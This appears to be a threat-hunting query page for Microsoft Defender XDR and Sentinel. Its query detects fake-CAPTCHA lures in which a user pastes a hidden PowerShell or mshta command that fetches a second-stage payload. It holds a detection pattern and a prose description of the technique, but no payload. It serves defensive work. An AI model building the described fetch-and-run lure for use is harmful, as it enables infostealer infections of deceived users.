Query Details
Power Shell Executions From Clipboard
Query
# Malicious PowerShell Executions From Clipboard Copy-and-Paste
## Query Information
#### MITRE ATT&CK Technique(s)
| Technique ID | Title | Link |
| --- | --- | --- |
| T1204.001 | User Execution: Malicious Link| https://attack.mitre.org/techniques/T1204/001/ |
#### Description
This query is to hunt for the threat of Fake CAPTCHA / Bot verification social engineering techniques used by the actor to lure the victim to click copy-and-paste button on the website with malicious powershell for the retrieval of the second stage payload and subsequently executed on the victim's device. The idea of the query is to detect the events of clipboard data being accessed and followed by PowerShell execution under 1 minute of time window.
#### Risk
This query is to hunt for Fake CAPTCHA / Bot verification social engineering malicious powershell execution.
#### Author
Github: [ch4meleon](https://github.com/ch4meleon)
#### References
- https://pkcert.gov.pk/advisory/24-19.pdf
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/
- https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages
- https://labs.guard.io/deceptionads-fake-captcha-driving-infostealer-infections-and-a-glimpse-to-the-dark-side-of-0c516f4dc0b6
## Defender XDR
```
let clipboardEvents =
DeviceEvents
| where ActionType contains "GetClipboardData"
and InitiatingProcessFileName contains "explorer.exe";
let powershellEvents =
DeviceProcessEvents
| where (FileName contains "powershell.exe" and (ProcessCommandLine contains "hidden") and ProcessCommandLine contains "http" and ProcessCommandLine !contains "http://localhost") or (FileName contains "mshta.exe" and ProcessCommandLine contains "http" and ProcessCommandLine !contains "http://localhost");
clipboardEvents
| join kind=inner (powershellEvents) on DeviceName
| where abs(datetime_diff('minute', TimeGenerated, TimeGenerated1)) <= 1
| summarize by DeviceName
```
## Sentinel
```
let clipboardEvents =
DeviceEvents
| where ActionType contains "GetClipboardData"
and InitiatingProcessFileName contains "explorer.exe";
let powershellEvents =
DeviceProcessEvents
| where (FileName contains "powershell.exe" and (ProcessCommandLine contains "hidden") and ProcessCommandLine contains "http" and ProcessCommandLine !contains "http://localhost") or (FileName contains "mshta.exe" and ProcessCommandLine contains "http" and ProcessCommandLine !contains "http://localhost");
clipboardEvents
| join kind=inner (powershellEvents) on DeviceName
| where abs(datetime_diff('minute', TimeGenerated, TimeGenerated1)) <= 1
| summarize by DeviceName
```
Explanation
This query is designed to detect potential malicious activity involving PowerShell scripts that are executed as a result of a social engineering attack using fake CAPTCHA or bot verification techniques. Here's a simple breakdown of what the query does:
-
Objective: The query aims to identify instances where a user is tricked into copying and pasting a malicious PowerShell command from a website, which then executes on their device.
-
Technique: The attack leverages a fake CAPTCHA or bot verification prompt to deceive users into executing a harmful script.
-
Detection Method:
- The query looks for two types of events:
- Clipboard Access: It checks for events where clipboard data is accessed by the "explorer.exe" process. This indicates that something was copied to the clipboard.
- PowerShell Execution: It searches for PowerShell or mshta.exe processes that run commands containing "http" (indicating a web request) but not "http://localhost" (to exclude local testing), and where the command is hidden.
- It then correlates these events by matching them on the same device and ensuring they occur within one minute of each other.
- The query looks for two types of events:
-
Output: The query lists devices where both clipboard access and suspicious PowerShell execution occur in close succession, suggesting a possible malicious activity.
-
Purpose: This helps security teams identify and respond to potential threats where users are tricked into executing harmful scripts, thereby enhancing the organization's cybersecurity posture.
Details
Bert-Jan Pals
Released: January 22, 2025
Tables
Keywords
Operators